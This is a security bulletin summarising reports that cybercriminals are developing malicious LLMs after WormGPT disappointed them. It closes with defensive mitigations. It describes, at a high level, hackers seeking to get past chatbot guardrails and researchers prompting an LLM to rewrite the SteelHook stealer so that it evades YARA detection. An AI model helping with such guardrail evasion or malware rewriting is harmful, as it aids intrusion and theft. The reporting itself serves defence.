Hackers Developing Malicious LLMs After WormGPT Falls Flat

Summary:
Researchers have noted that cybercriminals are increasingly interested in developing malicious large language models due to the limitations of existing tools like WormGPT. Ransomware and malware operators are also showing interest in this trend. The demand for AI talent has risen as previous tools like WormGPT failed to meet cybercriminals’ needs. Etay Maor, a senior director of security strategy at Cato Networks, highlighted discussions among hackers in underground forums. These discussions revolve around finding ways to exploit the guardrails implemented by AI-powered chatbots. For instance, Maor pointed out a case on Telegram where a Russian-speaking threat actor named Poena was actively recruiting AI and machine learning experts to collaborate on developing malicious LLM products.

This growing interest in custom malicious LLMs isn't limited to a specific group of cybercriminals. Ransomware and malware operators are also showing a keen interest in this emerging trend. The surge in demand for AI talent can be attributed to the disappointment experienced with existing custom tools advertised in underground markets, which failed to deliver the desired functionalities to threat actors.

A report by Recorded Future published on March 19 delves deeper into how threat actors are leveraging generative AI techniques to craft malware and exploits. The report identifies four primary malicious use cases for AI, including evading detection tools commonly used by LLM applications through techniques like YARA rules. It showcases a practical example of researchers altering SteelHook, a PowerShell info stealer used by APT28, to bypass detection by prompting an LLM system to modify the malware's source code dynamically.

Security Officer Comments:
Recorded Future also sheds light on the potential use of multi-model AI by advanced nation-state actors. This involves sorting through vast amounts of intelligence data to identify vulnerabilities in critical systems such as industrial control systems (ICS). However, it's noted that access to such high-power computing resources remains a significant challenge for lower-tier threat actors, limiting their operations to activities like creating phishing emails.

Suggested Corrections:
Researchers at Recorded Future recommend the following mitigations to effectively counter AI-generated polymorphic strains developed by threat actors:

  • Executives’ voices and likenesses are now part of an organization’s attack surface, and organizations need to assess the risk of impersonation in targeted attacks. Large payments and sensitive operations should use several alternate methods of communication and verification, other than conference calls and VOIP, such as encrypted messaging or emails.
  • Organizations, particularly in the media and public sector, should track instances of their branding or content being used to conduct influence operations.
  • Organizations should invest in multi-layered and behavioral malware detection capabilities in the event that threat actors are able to develop AI-assisted polymorphic malware. Sigma, Snort, and complex YARA rules will almost certainly remain reliable indicators for malware activity for the foreseeable future.
  • Publicly accessible images and videos of sensitive equipment and facilities should be scrutinized and scrubbed, particularly for critical infrastructure and sensitive sectors such as defense, government, energy, manufacturing, and transportation.

Link(s):
https://www.databreachtoday.com/hackers-developing-malicious-llms-after-wormgpt-falls-flat-a-24724

https://www.recordedfuture.com/adversarial-intelligence-red-teaming-malicious-use-cases-ai